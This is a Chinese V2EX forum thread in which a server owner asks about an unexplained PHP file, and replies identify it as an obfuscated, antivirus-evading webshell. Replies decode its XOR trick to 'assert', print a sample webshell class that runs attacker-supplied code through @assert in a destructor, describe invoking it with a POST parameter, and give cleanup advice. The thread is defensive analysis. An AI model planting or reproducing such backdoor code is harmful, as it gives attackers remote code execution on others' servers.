服务器莫名其妙多了个文件,帮我看一下这个 PHP 文件的代码有什么用?

2019-10-30 09:59:57 +08:00
 frozenway

不知道写的是什么,感觉这代码也写得太烂了,一点都不规范啊

7500 次点击
所在节点    PHP
27 条回复
CloudMx
2019-10-30 10:09:42 +08:00
变形的一句话:
php > echo '?'^"\x5e";
a
php > echo 'y'^"\xa";
s
php > echo '<'^"\x4f";
s
php > echo 'i'^"\xc";
e
php > echo ':'^"\x48";
r
php > echo 't'^"\x0";
t
opticaline
2019-10-30 10:11:53 +08:00
正常开发没人这么写代码,所以服务器上看到乱七八糟的代码都是被黑了。
ShangAliyun
2019-10-30 10:13:41 +08:00
不知道是不是一句话木马类的东西,用来检测网站是否有能注入文件的漏洞的
tomychen
2019-10-30 10:13:56 +08:00
变形免杀 webshell
兄弟,你的机器被 shell 了
shench
2019-10-30 10:19:07 +08:00
这显然是木马啊!
luckyrayyy
2019-10-30 10:21:27 +08:00
谁能给解释下啥意思..
falcon05
2019-10-30 10:22:21 +08:00
这就是木马
golden0125
2019-10-30 10:23:31 +08:00
恭喜你,中马了
Dogergo
2019-10-30 10:24:28 +08:00
是个木马

```php
class EPLF
{

function __destruct()
{
return @assert("$this->RU");
}
}
$a = new EPLF();
@$a->RU = mkdir('/d/shellattack',0777,true);


```

类似这样,可以通过远程请求该文件执行一些非法操作,执行的操作通过 post/get 提交的变量来处理。
sauren
2019-10-30 10:26:54 +08:00
一个 php 一句话木马。mr6 是密码。存在 id 参数时 base64 解密,不存在 id 时直接执行。usage:POST mr6=phpinfo() 将会执行 phpinfo。
ahsjs
2019-10-30 10:35:44 +08:00
析构方法过狗么。
eason1874
2019-10-30 10:36:25 +08:00
assert,效果类似 eval。就是在析构的时候把 RU 变量作为代码字符串传给 assert 执行。
laoyur
2019-10-30 10:40:13 +08:00
莫名喜感
JingNi
2019-10-30 10:42:43 +08:00
构造函数的字符串连接,是专门绕过 waf 的一句话木马,直接能读写你网站根目录的文件,建议楼主备份数据库,检查网站访问日志还有运行环境,找可疑的访问用户。再审计上线原源码的图片上传点还有其他文件包含点吧。
Mithril
2019-10-30 10:43:18 +08:00
被黑了居然还嫌人代码不规范
被抢了嫌劫匪不够帅?
locoz
2019-10-30 11:26:51 +08:00
@Mithril #15 哈哈哈哈哈哈哈哈哈哈哈哈哈太精辟了
leadfast
2019-10-30 11:54:06 +08:00
通常我会觉得这写的太牛批了,狗头保命
wzhndd2
2019-10-30 14:07:21 +08:00
我也遇到过这种情况,但我是个懒人,我如何能避免自己的服务器免于这种情况呢
frozenway
2019-10-30 14:52:38 +08:00
@wzhndd2 同问
sunziren
2019-10-30 15:00:58 +08:00
@wzhndd2 拔网线

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/614324

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX